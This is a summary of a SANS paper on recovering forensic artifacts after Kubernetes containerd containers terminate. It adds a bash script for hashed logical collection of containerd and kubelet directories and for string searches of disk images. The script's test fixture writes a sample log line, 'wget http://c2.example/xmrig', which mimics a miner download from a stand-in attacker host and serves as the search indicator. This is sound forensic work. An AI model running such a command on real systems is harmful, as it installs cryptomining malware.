SEC595: Applied Data Science and AI/Machine Learning for Cybersecurity Professionals


A container is a standard unit of software that packages code together with its dependencies so that the application runs quickly and reliably across computing environments. Organizations have increasingly adopted containerization for its efficiency, flexibility, and portability. At scale, however, an orchestrator is required to manage a large number of containers.
Kubernetes, for example, runs many containers simultaneously, and any of them can be torn down in an instant. This poses a challenge for cybersecurity incident responders: the forensic artifacts a container leaves behind are short-lived, which affects the analysis. That leads to the research question: What forensic artifacts can be recovered from memory and disk after a Kubernetes-managed containerd container terminates on a Linux system, and how do container runtime behaviors affect their persistence and accessibility?
To answer the research question, seven container termination methods were grouped into five categories and tested in a lab environment. The attacks simulated to assess artifact persistence were mapped to Team TNT tactics, techniques, and procedures (TTPs). Artifacts generated by the attack simulation were acquired forensically using a structured method: a tool, "k8fc.sh", was developed for logical collection; two memory images were acquired for each test; and a string search of the disk was performed.
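To make the logical-collection and disk-string-search steps concrete, the following is an added shell example written for this page; it is not the paper's k8fc.sh and is not derived from it. It copies the directories where containerd and the kubelet leave container artifacts on a stock Linux node (the default containerd root and state directories, kubelet pod logs and pod sandboxes), hashes everything it copied into a manifest, and runs a fixed-string search over either a directory tree or a raw disk image. Memory acquisition, the paper's two images per test, is outside this script. The ROOT parameter, the make_fixture layout, the pod name web-0 and the indicator string xmrig are constructed for the example and are not taken from the paper.

```bash
#!/usr/bin/env bash
# Added example for this page (not the paper's k8fc.sh): logical collection of
# containerd / kubelet artifacts from a Linux node, with a hashed manifest, plus a
# fixed-string search over a directory tree or a raw disk image.
set -euo pipefail

# Default locations on a stock containerd + kubelet node. Paths are relative so the
# same functions can run against "/", a mounted disk image, or the fixture below.
ARTIFACT_PATHS=(
  "var/lib/containerd"    # containerd root: content store, snapshots, metadata.db
  "run/containerd"        # containerd state: per-task runtime dirs, shim sockets
  "var/log/pods"          # kubelet pod logs (<ns>_<pod>_<uid>/<container>/N.log)
  "var/log/containers"    # symlinks into /var/log/pods, one per container
  "var/lib/kubelet/pods"  # pod sandboxes: volumes, etc-hosts, projected tokens
)

# Prefer coreutils sha256sum; fall back to shasum where it is absent.
HASH_CMD="$(command -v sha256sum || echo 'shasum -a 256')"

# collect_artifacts ROOT OUTDIR
# Copies every artifact directory that exists under ROOT into OUTDIR (paths, mtimes
# and symlinks preserved), then hashes each regular file into a manifest.
# Prints the number of files hashed.
collect_artifacts() {
  local root="$1" out="$2" rel src
  mkdir -p "$out"
  : > "$out/manifest.sha256"
  for rel in "${ARTIFACT_PATHS[@]}"; do
    src="$root/$rel"
    if [ ! -d "$src" ]; then
      echo "skip (absent): $src" >&2
      continue
    fi
    mkdir -p "$out/$rel"
    cp -a "$src/." "$out/$rel/"   # -a: keep mode/mtime, copy symlinks as links
  done
  # shellcheck disable=SC2086  (HASH_CMD may carry arguments)
  find "$out" -type f ! -name manifest.sha256 -exec $HASH_CMD {} + >> "$out/manifest.sha256"
  printf '%s\n' "$(wc -l < "$out/manifest.sha256" | tr -d '[:space:]')"
}

# string_search TARGET PATTERN
# TARGET is a directory (prints how many files contain PATTERN) or a file such as a
# raw disk image or block device (prints how many matching "lines" it holds, binary
# data treated as text so hits in unallocated space are still reported).
string_search() {
  local target="$1" pattern="$2" n
  if [ -d "$target" ]; then
    n="$(grep -r -l -a -F -- "$pattern" "$target" 2>/dev/null | wc -l || true)"
  else
    n="$(grep -a -c -F -- "$pattern" "$target" 2>/dev/null || true)"
  fi
  n="${n//[[:space:]]/}"
  printf '%s\n' "${n:-0}"
}

# make_fixture
# Builds a constructed node layout (sample data, not from the paper) in a temp dir
# so the example runs offline, and prints the fixture root.
make_fixture() {
  local root logdir
  root="$(mktemp -d)"
  logdir="$root/var/log/pods/default_web-0_0000/app"
  mkdir -p "$root/var/lib/containerd/io.containerd.content.v1.content/blobs/sha256" \
           "$logdir" "$root/var/log/containers"
  # kubelet-style JSON log line recording a download run inside the container
  printf '{"log":"wget http://c2.example/xmrig\\n","stream":"stdout"}\n' > "$logdir/0.log"
  ln -s "$logdir/0.log" "$root/var/log/containers/web-0_default_app-abc123.log"
  printf 'layer bytes' > "$root/var/lib/containerd/io.containerd.content.v1.content/blobs/sha256/0123abcd"
  # a tiny "disk image" holding the same indicator between NUL bytes (unallocated space)
  printf 'free\0\0xmrig\0\0space' > "$root/disk.img"
  printf '%s\n' "$root"
}

# Stand-alone run: collect from the fixture and search it.
demo() {
  local root out
  root="$(make_fixture)"
  out="$(mktemp -d)"
  echo "hashed files: $(collect_artifacts "$root" "$out")"
  echo "log files with indicator: $(string_search "$root/var/log/pods" xmrig)"
  echo "disk image hits: $(string_search "$root/disk.img" xmrig)"
}
demo
```

On a live node, run it as root with `collect_artifacts / /mnt/evidence/node1`, or point ROOT at a mounted image of the node's disk; the collection should run before the pod is deleted where possible, because containerd removes the container's runtime state under /run/containerd and its writable snapshot when the container is removed, and the string search over the raw device is what is left to find fragments of those after the fact.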